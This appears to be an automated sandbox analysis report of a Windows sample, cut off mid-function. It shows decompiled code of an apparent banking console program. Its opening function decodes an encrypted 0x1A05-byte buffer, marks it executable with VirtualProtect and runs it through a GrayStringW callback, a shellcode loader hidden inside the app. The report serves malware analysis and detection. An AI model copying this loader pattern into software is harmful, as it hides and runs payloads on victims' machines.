				_v28 = _v36(0, L"IEUCIZEO", 0xa);
				_v32 = _v20(0, _v28);
				memcpy( &_v7704, _v32, 0x1a05);
				_t163 = _t162 + 0xc;
				_v12 = 0;
				while(_v12 < 0x1a05) {
					_v5 =  *((intOrPtr*)(_t161 + _v12 - 0x1e14));
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 9;
					_v5 = _v5 & 0x000000ff ^ 0x00000026;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					 *((char*)(_t161 + _v12 - 0x1e14)) = _v5;
					_v12 = _v12 + 1;
				}
				VirtualProtect( &_v7704, 0x1a05, 0x40,  &_v40);
				GrayStringW(GetDC(0), 0,  &_v7704,  &_v1040, 0, 0, 0, 0, 0); // executed
				E002324F0( &_v1040);
				while(1) {
					E002310D0(8, 9, 0x46, 0xd);
					E00231000(0xa, 0xb);
					printf("Press A to Log in as ADMINISTRATOR or S to log in as STAFF\n\n\n\t\t\t\t\t");
					_t163 = _t163 + 4;
					if((_v5 & 0x000000ff) == 0x41 || (_v5 & 0x000000ff) == 0x61) {
						break;
					}
					if((_v5 & 0x000000ff) == 0x53 || (_v5 & 0x000000ff) == 0x73) {
						E00233C70(_t168);
					} else {
						if((_v5 & 0x000000ff) == 0x1b) {
							exit(0);
						}
						if(1 != 0) {
							continue;
						}
					}
					L14:
					return 0;
				}
				strcpy(0x23b244, "Admin");
				E00232600(_t168);
				goto L14;
			}

0x00237970
0x00237970
0x00237978
0x00237988
0x0023798b
0x0023799e
0x002379af
0x002379c0
0x002379cf
0x002379db
0x002379ee
0x002379f3
0x002379f6
0x00237a08
0x00237a1f
0x00237a29
0x00237a33
0x00237a46
0x00237a50
0x00237a5a
0x00237a64
0x00237a77
0x00237a81
0x00237a8a
0x00237a94
0x00237a9d
0x00237aa6
0x00237ab0
0x00237aba
0x00237ac3
0x00237acd
0x00237ad6
0x00237a05
0x00237a05
0x00237af4
0x00237b1a
0x00237b20
0x00237b25
0x00237b2d
0x00237b36
0x00237b40
0x00237b46
0x00237b50
0x00000000
0x00000000
0x00237b7b
0x00237b86
0x00237b8d
0x00237b94
0x00237b98
0x00237b98
0x00237ba5
0x00000000
0x00000000
0x00237ba5
0x00237bab
0x00237bb0
0x00237bb0
0x00237b65
0x00237b6d
0x00000000

APIs

GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 00237982

Part of subcall function 00237910: GetProcessHeap.KERNEL32(00000001,17D78400,?,?,?,00237990), ref: 0023791C
Part of subcall function 00237910: RtlAllocateHeap.NTDLL(00000000,?,?,?,00237990), ref: 00237923
Part of subcall function 00237910: GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,?,00237990), ref: 0023795D
Part of subcall function 00237910: HeapAlloc.KERNEL32(00000000,?,?,?,00237990), ref: 00237964

memcpy.MSVCRT ref: 002379EE
VirtualProtect.KERNELBASE(?,00001A05,00000040,?), ref: 00237AF4
GetDC.USER32 ref: 00237B13
GrayStringW.USER32(00000000), ref: 00237B1A
printf.MSVCRT ref: 00237B40
strcpy.MSVCRT(0023B244,Admin), ref: 00237B65
exit.MSVCRT ref: 00237B98

Strings

Kernel32.dll, xrefs: 0023797D
IEUCIZEO, xrefs: 002379C5
Press A to Log in as ADMINISTRATOR or S to log in as STAFF, xrefs: 00237B3B
Admin, xrefs: 00237B5B

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocAllocateGrayHandleModuleProtectStringVirtualexitmemcpyprintfstrcpy
String ID: Admin$IEUCIZEO$Kernel32.dll$Press A to Log in as ADMINISTRATOR or S to log in as STAFF
API String ID: 2634848931-105592271
Opcode ID: 0f840de78907915976156dfbe8396d55091ed1cee43d475eaee2e644cd221dc3
Instruction ID: e18e0629f4a73268500404ee69e31d1785b75d746b706325a4aa28fbac12ff1f
Opcode Fuzzy Hash: 0f840de78907915976156dfbe8396d55091ed1cee43d475eaee2e644cd221dc3
Instruction Fuzzy Hash: CF617BB0D5C3D8BACF11CBE48891BEDBFB19F5A301F0880C5F59166282C6764759CB21

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0115F885, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.244209682.000000000115E000.00000040.00000001.sdmp, Offset: 0115E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 528a4f16991854913c462da7ad73e791a05de82d13dc41471258f931d0ebd2d2
Instruction ID: b828f2cb2b3d1547850e1eb5a4faa6d8d2e659d60297276671817f2dc6d55fec
Opcode Fuzzy Hash: 528a4f16991854913c462da7ad73e791a05de82d13dc41471258f931d0ebd2d2
Instruction Fuzzy Hash: B5E01A3626450AEFDB88DBA8CC81D55B3E8EB19320B154294FD29C73A0E734EE008A50

Uniqueness

Uniqueness Score: -1.00%

Function 0115F8C2, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.244209682.000000000115E000.00000040.00000001.sdmp, Offset: 0115E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
Instruction ID: a238aa8c16fe840efc6529271006a691e9ab211fddf93ad0b5db2cba501be2aa
Opcode Fuzzy Hash: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
Instruction Fuzzy Hash: 1CE04F33610562DFC7A59A5DC800C92F7E8EF886B07164426EE69D7610D330FC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00237790, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00237790() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}

0x002377a7

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80

Uniqueness

Uniqueness Score: -1.00%

Function 0115F016, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.244209682.000000000115E000.00000040.00000001.sdmp, Offset: 0115E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction ID: 6162e005e4244d67ff1a1d32903e7cdd976e7dfcf72320dafc804842727d4cbf
Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction Fuzzy Hash: 8AB012756154C18EEB57C338C415B2276F2A740F01FCD94F0F005C2C82C75CC984D100

Uniqueness

Uniqueness Score: -1.00%

Function 0115F925, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.244209682.000000000115E000.00000040.00000001.sdmp, Offset: 0115E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 0115FA6D, Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.244209682.000000000115E000.00000040.00000001.sdmp, Offset: 0115E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f377ddc5f06dfc3153ea0c28b0a1464ef23ffe7e410e0425465c082cb6f6e04
Instruction ID: cb197d2559c09660318d3d12e6cb9f80cf1b08a2d0c32daa4285e7c7a95ab15a
Opcode Fuzzy Hash: 3f377ddc5f06dfc3153ea0c28b0a1464ef23ffe7e410e0425465c082cb6f6e04
Instruction Fuzzy Hash: ECA00179152A809BD7128B55D558B9476A4B748A44F9544A4D40546A51827C5504CE04

Uniqueness

Uniqueness Score: -1.00%

Function 00233C70, Relevance: 128.1, APIs: 47, Strings: 26, Instructions: 355
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00233C70(void* __fp0) {
				char _v5;
				int _v12;
				signed int _v16;
				int _v20;
				int _v24;
				char _v36;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v68;
				char _v80;
				char _v92;
				char _v124;
				char _v156;
				struct _IO_FILE* _t67;
				int _t69;
				int _t115;
				int _t116;
				struct _IO_FILE* _t126;
				void* _t140;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t157;
				void* _t174;

				_t174 = __fp0;
				_v68 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v12 = 0;
				_v20 = 0;
				_v20 = 0;
				do {
					E002310D0(0xa, 8, 0x46, 0xf);
					E00231000(7, 5);
					printf("Only THREE attempts shall be allowed to enter username and password.");
					E00231000(0x17, 0xa);
					printf("Enter User name : ");
					_push(0x23b244);
					scanf("%s");
					E00231000(0x17, 0xc);
					printf("Password        : ");
					E00231040( &_v68);
					strcpy(0x23b262,  &_v68);
					_t145 = _t140 + 0x1c;
					_v20 = _v20 + 1;
					if(_v20 == 3) {
						E002323F0( &_v68, _t174);
						E00231000(0x19, 0xa);
						printf(0x239cec);
						E00231000(0x16, 0xc);
						printf("Press ENTER to exit the program...");
						_t145 = _t145 + 8;
						exit(0);
					}
					_v12 = 0;
					_t67 = fopen("USER.DAT", "r");
					_t146 = _t145 + 8;
					 *0x23b288 = _t67;
					while(1) {
						_t126 =  *0x23b288; // 0x0
						_t69 = fscanf(_t126, "%s %s %s\n",  &_v92,  &_v124,  &_v156);
						_t147 = _t146 + 0x14;
						if(_t69 == 0xffffffff) {
							break;
						}
						strcpy( &_v124, _strupr( &_v124));
						strcpy( &_v156, _strupr( &_v156));
						strcpy(0x23b244, _strupr(0x23b244));
						strcpy(0x23b262, _strupr(0x23b262));
						_t115 = strcmp(0x23b244,  &_v124);
						_t146 = _t147 + 0x38;
						if(_t115 == 0) {
							_t116 = strcmp(0x23b262,  &_v156);
							_t146 = _t146 + 8;
							if(_t116 == 0) {
								_v12 = _v12 + 1;
								strcpy(0x23b240,  &_v92);
								_t146 = _t146 + 8;
							}
						}
					}
					_t127 =  *0x23b288; // 0x0
					fclose(_t127);
					_t148 = _t147 + 4;
					E002323F0(_t127, _t174);
					if(_v12 == 0) {
						goto L10;
					}
					break;
					L10:
					E00231000(0xa, 0xa);
					printf(0x239d4c);
					_t140 = _t148 + 4;
				} while (1 != 0);
				__imp___strtime( &_v80);
				_t149 = _t148 + 4;
				E002341D0(_t174);
				do {
					E002323F0(_t127, _t174);
					E00231000(0xf, 8);
					printf("1. Create New Account\n");
					E00231000(0xf, 0xa);
					printf("2. Cash Deposit");
					E00231000(0xf, 0xc);
					printf("3. Cash Withdrawl");
					E00231000(0xf, 0xe);
					printf("4. Fund Transfer");
					E00231000(0xf, 0x10);
					printf("5. Account information");
					E00231000(0x2d, 8);
					printf("6. Transaction information");
					E00231000(0x2d, 0xa);
					printf("7. Log out");
					E00231000(0x2d, 0xc);
					printf("8. Exit");
					_t157 = _t149 + 0x20;
					E00231000(1, 0x11);
					_v24 = 0;
					while(_v24 < 0x4e) {
						printf("_");
						_t157 = _t157 + 4;
						_t127 = _v24 + 1;
						_v24 = _v24 + 1;
					}
					E00231000(0x17, 0x13);
					printf("Press a choice between the range [1-8] ");
					_t149 = _t157 + 4;
					_v16 = 0x30;
					_v16 = _v16 - 1;
					if(_v16 > 7) {
						E002323F0(_t127, _t174);
						E00231000(0xa, 0xa);
						printf("Your input is out of range! Enter a choice between 1 to 8!");
						E00231000(0xf, 0xc);
						printf("Press any key to return to main menu...");
						_t149 = _t149 + 8;
					} else {
						switch( *((intOrPtr*)(_v16 * 4 +  &M002341A4))) {
							case 0:
								E00234510(_t127, _t174);
								goto L35;
							case 1:
								__eax = E00234E40(__ecx, __fp0);
								goto L35;
							case 2:
								__eax = E002352E0(__ecx, __fp0);
								goto L35;
							case 3:
								__eax = E002358A0(__fp0);
								goto L35;
							case 4:
								__eax = E00236220(__ecx, __fp0);
								goto L35;
							case 5:
								__eax = E00236E00(__ecx, __edx, __fp0);
								goto L35;
							case 6:
								E002323F0(__ecx, __fp0) = E00231000(0xf, 0xa);
								__eax = printf("Are you sure you want to Log out? <Y/N> : ");
								__ecx = _v5;
								if(__ecx == 0x59) {
									L28:
									__eax =  &_v36;
									_push( &_v36);
									__imp___strtime();
									__esp = __esp + 4;
									 *0x23b288 = fopen("LOG.DAT", "a");
									__ecx =  &_v36;
									_push( &_v36);
									__edx =  &_v80;
									_push( &_v80);
									_push(0x23b2a0);
									_push(0x23b240);
									__eax =  *0x23b288; // 0x0
									__eax = fprintf(__eax, "%s %s %s %s\n");
									__ecx =  *0x23b288; // 0x0
									fclose(__ecx) = E00233C70(__fp0);
								} else {
									__edx = _v5;
									if(_v5 == 0x79) {
										goto L28;
									}
								}
								goto L35;
							case 7:
								E002323F0(__ecx, __fp0) = E00231000(0xf, 0xa);
								__eax = printf("Are you sure you want to exit? <Y/N> : ");
								__edx = _v5;
								if(_v5 == 0x59) {
									L32:
									__ecx =  &_v36;
									_push( &_v36);
									__imp___strtime();
									__esp = __esp + 4;
									 *0x23b288 = fopen("LOG.DAT", "a");
									__edx =  &_v36;
									_push( &_v36);
									__eax =  &_v80;
									_push( &_v80);
									_push(0x23b2a0);
									_push(0x23b240);
									__ecx =  *0x23b288; // 0x0
									__eax = fprintf(__ecx, "%s %s %s %s\n");
									__edx =  *0x23b288; // 0x0
									__eax = fclose(__edx);
									exit(0);
								} else {
									__eax = _v5;
									if(_v5 == 0x79) {
										goto L32;
									}
								}
								goto L35;
						}
					}
					L35:
				} while (1 != 0);
				return 1;
			}

0x00233c70
0x00233c79
0x00233c7f
0x00233c82
0x00233c85
0x00233c88
0x00233c8b
0x00233c8e
0x00233c91
0x00233c94
0x00233c97
0x00233c9e
0x00233ca5
0x00233cac
0x00233cb4
0x00233cbd
0x00233cc7
0x00233cd4
0x00233cde
0x00233ce7
0x00233cf1
0x00233cfe
0x00233d08
0x00233d15
0x00233d23
0x00233d28
0x00233d31
0x00233d38
0x00233d3a
0x00233d43
0x00233d4d
0x00233d5a
0x00233d64
0x00233d6a
0x00233d6f
0x00233d6f
0x00233d75
0x00233d86
0x00233d8c
0x00233d8f
0x00233d94
0x00233da8
0x00233daf
0x00233db5
0x00233dbb
0x00000000
0x00000000
0x00233dd3
0x00233df3
0x00233e0f
0x00233e2b
0x00233e3c
0x00233e41
0x00233e46
0x00233e54
0x00233e59
0x00233e5e
0x00233e66
0x00233e72
0x00233e77
0x00233e77
0x00233e5e
0x00233e7a
0x00233e7f
0x00233e86
0x00233e8c
0x00233e8f
0x00233e98
0x00000000
0x00000000
0x00000000
0x00233e9a
0x00233e9e
0x00233ea8
0x00233eae
0x00233eba
0x00233ec6
0x00233ecc
0x00233ecf
0x00233ed4
0x00233ed4
0x00233edd
0x00233ee7
0x00233ef4
0x00233efe
0x00233f0b
0x00233f15
0x00233f22
0x00233f2c
0x00233f39
0x00233f43
0x00233f50
0x00233f5a
0x00233f67
0x00233f71
0x00233f7e
0x00233f88
0x00233f8e
0x00233f95
0x00233f9a
0x00233fac
0x00233fb7
0x00233fbd
0x00233fa6
0x00233fa9
0x00233fa9
0x00233fc6
0x00233fd0
0x00233fd6
0x00233fd9
0x00233fe6
0x00233fed
0x00234160
0x00234169
0x00234173
0x00234180
0x0023418a
0x00234190
0x00233ff3
0x00233ff6
0x00000000
0x00233ffd
0x00000000
0x00000000
0x00234007
0x00000000
0x00000000
0x00234011
0x00000000
0x00000000
0x0023401b
0x00000000
0x00000000
0x00234025
0x00000000
0x00000000
0x0023402f
0x00000000
0x00000000
0x00234042
0x0023404c
0x00234055
0x0023405c
0x00234067
0x00234067
0x0023406a
0x0023406b
0x00234071
0x00234087
0x0023408c
0x0023408f
0x00234090
0x00234093
0x00234094
0x00234099
0x002340a3
0x002340a9
0x002340b2
0x002340c2
0x0023405e
0x0023405e
0x00234065
0x00000000
0x00000000
0x00234065
0x00000000
0x00000000
0x002340d5
0x002340df
0x002340e8
0x002340ef
0x002340fa
0x002340fa
0x002340fd
0x002340fe
0x00234104
0x0023411a
0x0023411f
0x00234122
0x00234123
0x00234126
0x00234127
0x0023412c
0x00234136
0x0023413d
0x00234146
0x0023414d
0x00234158
0x002340f1
0x002340f1
0x002340f8
0x00000000
0x00000000
0x002340f8
0x00000000
0x00000000
0x00233ff6
0x00234193
0x00234198
0x002341a3

APIs

Part of subcall function 002310D0: printf.MSVCRT ref: 002310ED
Part of subcall function 002310D0: printf.MSVCRT ref: 0023112C
Part of subcall function 002310D0: printf.MSVCRT ref: 0023114E
Part of subcall function 002310D0: printf.MSVCRT ref: 002311C3
Part of subcall function 002310D0: printf.MSVCRT ref: 002311E7

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 00233CC7
printf.MSVCRT ref: 00233CDE
scanf.MSVCRT ref: 00233CF1
printf.MSVCRT ref: 00233D08

Part of subcall function 00231040: isprint.MSVCRT ref: 00231052
Part of subcall function 00231040: printf.MSVCRT ref: 0023107A

strcpy.MSVCRT(0023B262,00000000,00000000), ref: 00233D23
printf.MSVCRT ref: 00233D4D
printf.MSVCRT ref: 00233D64
exit.MSVCRT ref: 00233D6F
fopen.MSVCRT ref: 00233D86
fscanf.MSVCRT ref: 00233DAF
_strupr.MSVCRT ref: 00233DC5
strcpy.MSVCRT(?,00000000), ref: 00233DD3
_strupr.MSVCRT ref: 00233DE2
strcpy.MSVCRT(?,00000000), ref: 00233DF3
_strupr.MSVCRT ref: 00233E00
strcpy.MSVCRT(0023B244,00000000), ref: 00233E0F
_strupr.MSVCRT ref: 00233E1C
strcpy.MSVCRT(0023B262,00000000), ref: 00233E2B
strcmp.MSVCRT ref: 00233E3C
strcmp.MSVCRT ref: 00233E54
strcpy.MSVCRT(0023B240,?), ref: 00233E72
fclose.MSVCRT ref: 00233E86
printf.MSVCRT ref: 00233EA8
_strtime.MSVCRT ref: 00233EC6

Part of subcall function 002323F0: printf.MSVCRT ref: 0023240F
Part of subcall function 002323F0: strcmp.MSVCRT ref: 0023242B
Part of subcall function 002323F0: printf.MSVCRT ref: 0023244F
Part of subcall function 002323F0: printf.MSVCRT ref: 00232472
Part of subcall function 002323F0: _strdate.MSVCRT ref: 00232480
Part of subcall function 002323F0: printf.MSVCRT ref: 0023249D
Part of subcall function 002323F0: _strdate.MSVCRT ref: 002324AB
Part of subcall function 002323F0: printf.MSVCRT ref: 002324DF

printf.MSVCRT ref: 00233EE7
printf.MSVCRT ref: 00233EFE
printf.MSVCRT ref: 00233F15
printf.MSVCRT ref: 00233F2C
printf.MSVCRT ref: 00233F43
printf.MSVCRT ref: 00233F5A
printf.MSVCRT ref: 00233F71
printf.MSVCRT ref: 00233F88
printf.MSVCRT ref: 00233FB7

Part of subcall function 00234510: fopen.MSVCRT ref: 00234523
Part of subcall function 00234510: strcpy.MSVCRT(?,AC00001), ref: 00234546
Part of subcall function 00234510: fclose.MSVCRT ref: 002345BA
Part of subcall function 00234510: printf.MSVCRT ref: 002345D6
Part of subcall function 00234510: printf.MSVCRT ref: 0023460A
Part of subcall function 00234510: printf.MSVCRT ref: 00234623
Part of subcall function 00234510: scanf.MSVCRT ref: 00234638
Part of subcall function 00234510: scanf.MSVCRT ref: 0023464D
Part of subcall function 00234510: printf.MSVCRT ref: 00234664
Part of subcall function 00234510: scanf.MSVCRT ref: 00234676
Part of subcall function 00234510: printf.MSVCRT ref: 0023468D
Part of subcall function 00234510: scanf.MSVCRT ref: 0023469F

printf.MSVCRT ref: 00233FD0

Strings

LOG.DAT, xrefs: 0023410C
Are you sure you want to exit? <Y/N> : , xrefs: 002340DA
%s %s %s, xrefs: 00233DA3
LOG.DAT, xrefs: 00234079
1. Create New Account, xrefs: 00233EE2
Only THREE attempts shall be allowed to enter username and password., xrefs: 00233CC2
6. Transaction information, xrefs: 00233F55
Your input is out of range! Enter a choice between 1 to 8!, xrefs: 0023416E
Enter User name : , xrefs: 00233CD9
Press any key to return to main menu..., xrefs: 00234185
7. Log out, xrefs: 00233F6C
2. Cash Deposit, xrefs: 00233EF9
p5u:u@su, xrefs: 002340A9, 0023413D
5. Account information, xrefs: 00233F3E
Press a choice between the range [1-8] , xrefs: 00233FCB
Password : , xrefs: 00233D03
%s %s %s %s, xrefs: 00234131
0, xrefs: 00233FD9
%s %s %s %s, xrefs: 0023409E
8. Exit, xrefs: 00233F83
N, xrefs: 00233FAC
Are you sure you want to Log out? <Y/N> : , xrefs: 00234047
3. Cash Withdrawl, xrefs: 00233F10
Press ENTER to exit the program..., xrefs: 00233D5F
4. Fund Transfer, xrefs: 00233F27
USER.DAT, xrefs: 00233D81

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$strcpy$scanf$_strupr$strcmp$_strdatefclosefopen$ConsoleCursorHandlePosition_strtimeexitfscanfisprint
String ID: %s %s %s$%s %s %s %s$%s %s %s %s$0$1. Create New Account$2. Cash Deposit$3. Cash Withdrawl$4. Fund Transfer$5. Account information$6. Transaction information$7. Log out$8. Exit$Are you sure you want to Log out? <Y/N> : $Are you sure you want to exit? <Y/N> : $Enter User name : $LOG.DAT$LOG.DAT$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to exit the program...$Press a choice between the range [1-8] $Press any key to return to main menu...$USER.DAT$Your input is out of range! Enter a choice between 1 to 8!$p5u:u@su
API String ID: 2431344561-2917199691
Opcode ID: ba4553742d3dd67085febd102f7ae3e0f1da767d7bda5f57265741755ff0e12f
Instruction ID: 6b5564cecfcb47dfbc9b1cf7231116b9122bbda7dca794eaf87452d12757114f
Opcode Fuzzy Hash: ba4553742d3dd67085febd102f7ae3e0f1da767d7bda5f57265741755ff0e12f
Instruction Fuzzy Hash: D4C18CF0E60305ABE714BBB4ED4BB9E36346F12705F040125FA0AB9191DEB166788F67

Uniqueness

Uniqueness Score: -1.00%

Function 002352E0, Relevance: 112.4, APIs: 41, Strings: 23, Instructions: 406
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E002352E0(void* __ecx, void* __fp0) {
				char _v5;
				int _v12;
				char _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v42;
				char _v62;
				char _v112;
				char _v113;
				char _v125;
				char _v140;
				char _v170;
				char _v200;
				char _v208;
				char _v260;
				char _v340;
				char _v376;
				char _v456;
				struct _IO_FILE* _t90;
				struct _IO_FILE* _t95;
				int _t96;
				struct _IO_FILE* _t97;
				struct _IO_FILE* _t104;
				struct _IO_FILE* _t109;
				int _t110;
				struct _IO_FILE* _t111;
				int _t115;
				int _t132;
				struct _IO_FILE* _t134;
				struct _IO_FILE* _t139;
				int _t140;
				int _t150;
				struct _IO_FILE* _t154;
				int _t156;
				int _t161;
				int _t165;
				struct _IO_FILE* _t192;
				struct _IO_FILE* _t193;
				struct _IO_FILE* _t221;
				struct _IO_FILE* _t222;
				void* _t232;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t243;
				void* _t244;
				void* _t253;
				void* _t255;
				void* _t256;
				void* _t265;

				_t278 = __fp0;
				_v12 = 0;
				E002323F0(__ecx, __fp0);
				E00231000(5, 0xa);
				printf("Withdraw from A/C number          : ");
				_push( &_v28);
				scanf("%s");
				strcpy( &_v28, _strupr( &_v28));
				_t90 = fopen("ACCOUNT.DAT", "r");
				_t237 = _t232 + 0x20;
				 *0x23b288 = _t90;
				while(1) {
					_t95 =  *0x23b288; // 0x0
					_t96 = fscanf(_t95, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208,  &_v200,  &_v170,  &_v125,  &_v112,  &_v62,  &_v113,  &_v140,  &_v42,  &_v40,  &_v36,  &_v32);
					_t238 = _t237 + 0x38;
					if(_t96 == 0xffffffff) {
						break;
					}
					_t165 = strcmp( &_v28,  &_v208);
					_t237 = _t238 + 8;
					if(_t165 == 0) {
						_v12 = _v12 + 1;
						strcpy( &_v260,  &_v200);
						strcat( &_v260, " ");
						strcat( &_v260,  &_v170);
						_t237 = _t237 + 0x18;
					}
				}
				_t97 =  *0x23b288; // 0x0
				fclose(_t97);
				_t239 = _t238 + 4;
				__eflags = _v12;
				if(_v12 == 0) {
					E002323F0( &_v200, _t278);
					E00231000(0x14, 0xc);
					return printf("Given A/C number does not exits!");
				}
				E00231000(0x32, 0xa);
				_push( &_v260);
				printf("[ %s ]");
				E00231000(5, 0xc);
				printf("Amount to be Withdrawn (in NRs.)  : ");
				_push( &_v16);
				scanf("%f");
				_t104 = fopen("ACCOUNT.DAT", "r");
				_t243 = _t239 + 0x1c;
				 *0x23b288 = _t104;
				_v12 = 0;
				while(1) {
					_t109 =  *0x23b288; // 0x0
					_t110 = fscanf(_t109, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208,  &_v200,  &_v170,  &_v125,  &_v112,  &_v62,  &_v113,  &_v140,  &_v42,  &_v40,  &_v36,  &_v32);
					_t244 = _t243 + 0x38;
					__eflags = _t110 - 0xffffffff;
					if(_t110 == 0xffffffff) {
						break;
					}
					_t156 = strcmp( &_v208,  &_v28);
					_t243 = _t244 + 8;
					__eflags = _t156;
					if(__eflags == 0) {
						asm("movss xmm0, [ebp-0xc]");
						asm("comiss xmm0, [ebp-0x1c]");
						if(__eflags > 0) {
							E002323F0( &_v28, _t278);
							E00231000(0x14, 0xc);
							asm("cvtss2sd xmm0, [ebp-0x1c]");
							asm("movsd [esp], xmm0");
							printf("Sorry, the current balance is Rs. %.2f only!");
							E00231000(0x19, 0xe);
							_t161 = printf("Transaction NOT completed!");
							_v12 = 1;
							return _t161;
						}
					}
				}
				_t111 =  *0x23b288; // 0x0
				fclose(_t111);
				E002323F0( &_v200, _t278);
				E00231000(0x1e, 0xa);
				_t115 = printf("Confirm Transaction");
				asm("movss xmm0, [ebp-0xc]");
				asm("movss [esp], xmm0");
				E00231730(_t115,  &_v376);
				E00231000(3, 0xc);
				_push( &_v260);
				printf("%s to be Withdrawn from A/C number : %s [%s]");
				asm("cvtss2sd xmm0, [ebp-0xc]");
				asm("movsd [esp], xmm0");
				E00231A20( &_v456,  &_v376,  &_v28);
				strcpy( &_v340, "[In words : ");
				strcat( &_v340,  &_v456);
				strcat( &_v340, "]");
				E00231000(0x28 - (strlen( &_v340) >> 1), 0xe);
				puts( &_v340);
				E00231000(8, 0x11);
				_t132 = printf("Are you sure you want to perform this tranasction? <Y/N>");
				_t253 = _t244 + 0x14 - 8 + 0x24;
				__eflags = _v5 - 0x59;
				if(_v5 == 0x59) {
					L15:
					 *0x23b288 = fopen("ACCOUNT.DAT", "r");
					_t134 = fopen("TEMP.DAT", "w");
